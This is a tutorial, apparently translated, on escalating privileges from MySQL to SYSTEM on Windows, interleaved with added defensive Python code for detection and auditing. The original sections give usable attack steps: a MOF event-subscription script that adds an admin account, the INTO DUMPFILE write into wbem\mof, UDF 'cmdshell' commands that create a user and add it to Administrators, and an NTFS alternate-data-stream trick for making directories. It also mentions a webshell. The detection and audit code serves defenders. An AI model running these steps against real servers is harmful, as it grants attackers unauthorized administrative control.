1. MOF privilege escalation
Simply put, a MOF file is a program inside the system: the system runs it with root-level (SYSTEM) authority every time it is processed, so if we replace it with our own, our attack code is executed with that authority. This is what is referred to as MOF privilege escalation.
Here's the script:
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "filtP2";
    Query = "Select * from __InstanceModificationEvent "
            "Where targetinstance Isa \"Win32_localtime\" "
            "and Targetinstance.second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
        "var WSH = new ActiveXObject(\"Wscript.shell\")\nwsh.run(\"Net.exe user admin admin/add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
Save it as a.mof, find a writable directory to upload a.mof to, and then use MySQL to write it into place: select load_file('D:\wamp\a.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
If that goes through, the escalation has succeeded. PS: the account and password that get added are the ones written into the script.
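From the defender's side, the artefact this technique leaves behind is a MOF file (or a compiled WMI subscription) that binds an event filter to a consumer capable of running code. The following is an added example, not code from the original post: a small parser for MOF text in the shape shown above that reports every __FilterToConsumerBinding whose consumer is an ActiveScriptEventConsumer or CommandLineEventConsumer, the two consumer classes that execute scripts or commands. The embedded MOF is a constructed sample with a placeholder script text, not a real payload; it deliberately contains adjacent string literals and a semicolon inside a string, which is what breaks a naive line-by-line split.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Consumer classes that run arbitrary scripts or commands when their filter fires.
CODE_EXEC_CONSUMERS = {"activescripteventconsumer", "commandlineeventconsumer"}

# Constructed sample MOF for the example; the script text is a placeholder.
SAMPLE_MOF = r'''
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $Filter
{
    EventNamespace = "root\\cimv2";
    Name = "sample-filter";
    Query = "Select * from __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\"";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "sample-consumer";
    ScriptingEngine = "JScript";
    ScriptText = "/* placeholder; a real subscription runs attacker code here */";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $Filter;
};
'''

@dataclass
class MofInstance:
    cls: str
    alias: Optional[str]
    props: Dict[str, str] = field(default_factory=dict)

INSTANCE_RE = re.compile(
    r'instance\s+of\s+(\w+)(?:\s+as\s+(\$\w+))?\s*\{(.*?)\}\s*;', re.I | re.S)

def _split_statements(body: str) -> List[str]:
    """Split 'Name = value;' statements on ';' characters outside string literals."""
    out, cur, in_str, esc = [], [], False, False
    for ch in body:
        if in_str:
            cur.append(ch)
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            cur.append(ch)
        elif ch == ";":
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    tail = "".join(cur).strip()
    if tail:
        out.append(tail)
    return out

def _unquote(value: str) -> str:
    """Join adjacent MOF string literals ("a" "b") and drop the quotes; escapes are kept."""
    parts = re.findall(r'"((?:[^"\\]|\\.)*)"', value)
    return "".join(parts) if parts else value.strip()

def parse_mof(text: str) -> List[MofInstance]:
    """Return every 'instance of X [as $alias] { ... };' block with its properties."""
    instances = []
    for cls, alias, body in INSTANCE_RE.findall(text):
        inst = MofInstance(cls, alias or None)
        for stmt in _split_statements(body):
            name, _, value = stmt.partition("=")
            inst.props[name.strip().lower()] = _unquote(value)
        instances.append(inst)
    return instances

def find_persistence(instances: List[MofInstance]) -> List[str]:
    """Report bindings whose consumer is a script- or command-executing class."""
    by_alias = {i.alias: i for i in instances if i.alias}
    findings = []
    for inst in instances:
        if inst.cls.lower() != "__filtertoconsumerbinding":
            continue
        consumer = by_alias.get(inst.props.get("consumer", ""))
        if consumer and consumer.cls.lower() in CODE_EXEC_CONSUMERS:
            findings.append(f"{consumer.cls} '{consumer.props.get('name')}' "
                            f"bound to filter {inst.props.get('filter')}")
    return findings

if __name__ == "__main__":
    for finding in find_persistence(parse_mof(SAMPLE_MOF)):
        print("WMI persistence:", finding)
```

Run it over any .mof dropped under the wbem\mof directory the post targets; on a live host the same check can be done against the compiled subscriptions with PowerShell's Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding. A persistent ActiveScript or CommandLine consumer is rare in legitimate software and is worth an alert on its own.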
2. UDF privilege escalation
0x01
You need to check the MySQL version first, and when you export the DLL the backslashes in the path must be doubled (escaped).
MySQL version < 5.2: export the UDF to the system directory c:/windows/system32/
MySQL version > 5.2: export the UDF to the installation path mysql\lib\plugin\. Versions are generally greater than 5.2, and the plugin directory does not exist by default. It can be created with the chopper (China Chopper webshell); if that is not possible, create it through the NTFS stream method in 0x03.
0x02
Create a cmdshell function:
create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user Waitalone Waitalone.cn/add');
select cmdshell('net localgroup Administrators Waitalone/add');
drop function cmdshell;    (delete the function)
delete from mysql.func where name = 'cmdshell';    (remove the function's row from mysql.func)
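Everything in 0x02 leaves traces that a DBA or responder can audit: a row in mysql.func whose dl column points at a library nobody installed, a shared library sitting in plugin_dir, the FILE privilege on an application account, and a secure_file_priv setting that allows INTO DUMPFILE to write anywhere. The following is an added example, not code from the original post, of that audit. The rows and directory listing are constructed sample data standing in for the output of SELECT name, ret, dl, type FROM mysql.func, SELECT user, host, File_priv FROM mysql.user and a listing of plugin_dir; the allowlist and the set of admin accounts are assumptions to be replaced with the site's own.

```python
from typing import Iterable, List, Optional

# Libraries the DBA deliberately installed (constructed allowlist for the example).
ALLOWED_UDF_LIBRARIES = {"libmyudf.so"}
# Accounts expected to hold the FILE privilege (assumption for the example).
ADMIN_ACCOUNTS = {"root"}

# Constructed sample data standing in for the real query results.
SAMPLE_FUNC_ROWS = [
    {"name": "my_custom_func", "ret": 0, "dl": "libmyudf.so", "type": "function"},
    {"name": "cmdshell", "ret": 0, "dl": "udf.dll", "type": "function"},
]
SAMPLE_USER_ROWS = [
    {"user": "root", "host": "localhost", "File_priv": "Y"},
    {"user": "webapp", "host": "%", "File_priv": "Y"},
    {"user": "report", "host": "%", "File_priv": "N"},
]
SAMPLE_PLUGIN_DIR = ["libmyudf.so", "udf.dll", "staged.dll", "README.txt"]

def classify_secure_file_priv(value: Optional[str]) -> str:
    """Interpret secure_file_priv as the server does: NULL disables LOAD_FILE,
    INTO OUTFILE and INTO DUMPFILE entirely, an empty string leaves them
    unrestricted, and a directory confines them to that directory."""
    if value is None:
        return "disabled"
    if value.strip() == "":
        return "unrestricted"
    return "restricted"

def audit_udf_registrations(func_rows: Iterable[dict],
                            allowed=ALLOWED_UDF_LIBRARIES) -> List[str]:
    """Every UDF in mysql.func whose library is not allowlisted is reported."""
    return [f"UDF {r['name']} registered from unexpected library {r['dl']}"
            for r in func_rows if r["dl"].lower() not in allowed]

def audit_file_privilege(user_rows: Iterable[dict], admins=ADMIN_ACCOUNTS) -> List[str]:
    """FILE is what makes INTO DUMPFILE possible; it does not belong on app accounts."""
    return [f"{r['user']}@{r['host']} holds the FILE privilege"
            for r in user_rows if r["File_priv"] == "Y" and r["user"] not in admins]

def audit_plugin_dir(listing: Iterable[str], func_rows: Iterable[dict],
                     allowed=ALLOWED_UDF_LIBRARIES) -> List[str]:
    """A shared library in plugin_dir that is neither allowlisted nor yet referenced
    by mysql.func is a staged UDF waiting for CREATE FUNCTION ... SONAME."""
    referenced = {r["dl"].lower() for r in func_rows}
    return [f"unexpected shared library {name} in plugin_dir"
            for name in listing
            if name.lower().endswith((".so", ".dll"))
            and name.lower() not in allowed and name.lower() not in referenced]

def mysql_udf_audit(secure_file_priv: Optional[str], func_rows, user_rows,
                    plugin_listing) -> dict:
    """Combine the checks into one report with a coarse risk rating."""
    findings = (audit_udf_registrations(func_rows)
                + audit_file_privilege(user_rows)
                + audit_plugin_dir(plugin_listing, func_rows))
    sfp = classify_secure_file_priv(secure_file_priv)
    if any(f.startswith(("UDF ", "unexpected shared")) for f in findings):
        risk = "high"      # a foreign library is already staged or registered
    elif sfp == "unrestricted" and any("FILE privilege" in f for f in findings):
        risk = "medium"    # nothing dropped yet, but the write primitive is available
    else:
        risk = "low"
    return {"secure_file_priv": sfp, "risk": risk, "findings": findings}

if __name__ == "__main__":
    report = mysql_udf_audit("", SAMPLE_FUNC_ROWS, SAMPLE_USER_ROWS, SAMPLE_PLUGIN_DIR)
    print(f"secure_file_priv: {report['secure_file_priv']}  risk: {report['risk']}")
    for finding in report["findings"]:
        print(" -", finding)
```

The fix for a medium finding is configuration rather than cleanup: set secure_file_priv to a dedicated directory (or NULL where file I/O is not needed) and revoke FILE from every account that is not a DBA; a high finding means the library and the mysql.func row should be treated as an incident, not just dropped.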
0x03
By default you will run into the error Can't open shared library, which is a folder problem: the folder mentioned above has to exist first. You can create it directly with the chopper webshell; if that is not possible, create it through an NTFS alternate data stream.
Find the MySQL directory: select @@basedir;
Create the lib directory with an NTFS ADS: select 'It is dll' into dumpfile 'c:\\program Files\\mysql\\mysql Server 5.1\\lib::$INDEX_ALLOCATION';
Create the plugin directory with an NTFS ADS: select 'It is dll' into dumpfile 'c:\\program Files\\mysql\\mysql Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';
Then export the DLL, create the function, and use it to execute commands.
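Every step of both methods on this page passes through the MySQL server as an ordinary statement: the LOAD_FILE ... INTO DUMPFILE write under wbem\mof in section 1, the CREATE FUNCTION ... SONAME registration in 0x02, and the ::$INDEX_ALLOCATION directory trick just above. All of them show up verbatim in the general query log, which makes it a good place to detect this activity. The following is an added example, not code from the original post: a parser for general-log lines and a small rule set that flags file writes into system or plugin directories, the ADS trick and UDF registration, run over a constructed log excerpt in the MySQL 5.7-style format (the timestamps, connection ids and the innocuous queries are made up; the suspicious statements are the ones from this page).

```python
import re
from typing import Dict, List

# Constructed general-log excerpt in the MySQL 5.7/8.0 format:
# <timestamp>\t<thread id> <command>\t<argument>. Normal and raw literals are
# concatenated so the doubled backslashes survive exactly as they appear in the log.
SAMPLE_LOG = "\n".join([
    "2024-05-01T10:00:01.000000Z\t   42 Connect\twebapp@10.0.0.5 on shop",
    "2024-05-01T10:00:02.000000Z\t   42 Query\tselect id, name from products where id = 7",
    "2024-05-01T10:00:03.000000Z\t   42 Query\t"
    r"select 'It is dll' into dumpfile 'c:\\program Files\\mysql\\mysql Server 5.1\\lib\\plugin::$INDEX_ALLOCATION'",
    "2024-05-01T10:00:04.000000Z\t   42 Query\tcreate function cmdshell returns string soname 'udf.dll'",
    "2024-05-01T10:00:05.000000Z\t   42 Query\t"
    "select load_file('c:/tmp/a.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'",
    "2024-05-01T10:00:06.000000Z\t   43 Query\tselect count(*) from orders",
])

# One log entry: timestamp (5.7+ ISO form or the older "yymmdd hh:mm:ss"),
# thread id, command word, optional tab-separated argument.
LINE_RE = re.compile(
    r"^(?P<ts>\S+(?: \d\d:\d\d:\d\d)?)\t\s*(?P<conn>\d+) (?P<cmd>\w+)\t?(?P<arg>.*)$")

# Detection rules, matched case-insensitively against the whitespace-collapsed statement.
RULES = [
    ("file-write-to-wbem", r"into\s+(?:dump|out)file\s+'[^']*\bwbem[\\/]+mof\b"),
    ("file-write-to-system32", r"into\s+(?:dump|out)file\s+'[^']*windows[\\/]+system32"),
    ("file-write-to-plugin-dir", r"into\s+(?:dump|out)file\s+'[^']*[\\/]plugin\b"),
    ("ntfs-ads-directory-trick", r"into\s+(?:dump|out)file\s+'[^']*::\s*\$index_allocation"),
    ("udf-registration", r"create\s+function\s+\w+\s+returns\s+\w+\s+soname\s+'"),
]

def parse_general_log(text: str) -> List[Dict]:
    """Turn general-log text into entries; lines that do not start a new entry are
    continuation lines of a multi-line statement and are appended to the previous one."""
    entries: List[Dict] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append({"ts": m["ts"], "conn": int(m["conn"]),
                            "cmd": m["cmd"], "arg": m["arg"]})
        elif entries:
            entries[-1]["arg"] += "\n" + line
    return entries

def detect_file_abuse(entries: List[Dict]) -> List[Dict]:
    """Apply RULES to every Query entry and return one finding per matching rule."""
    findings = []
    for e in entries:
        if e["cmd"] != "Query":
            continue
        stmt = " ".join(e["arg"].split())   # collapse newlines and runs of spaces
        for rule, pattern in RULES:
            if re.search(pattern, stmt, re.I):
                findings.append({"ts": e["ts"], "conn": e["conn"],
                                 "rule": rule, "statement": stmt[:120]})
    return findings

if __name__ == "__main__":
    for f in detect_file_abuse(parse_general_log(SAMPLE_LOG)):
        print(f"{f['ts']} conn={f['conn']} {f['rule']}: {f['statement']}")
```

The general log is off by default and costly on busy servers, so in practice the same rules are better applied to audit-plugin output or to the query text a database proxy records; the patterns do not change. Any hit on the wbem, system32 or plugin-dir rules from an application account is high-confidence, since no web application has a reason to write files there.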
Summary of MySQL privilege escalation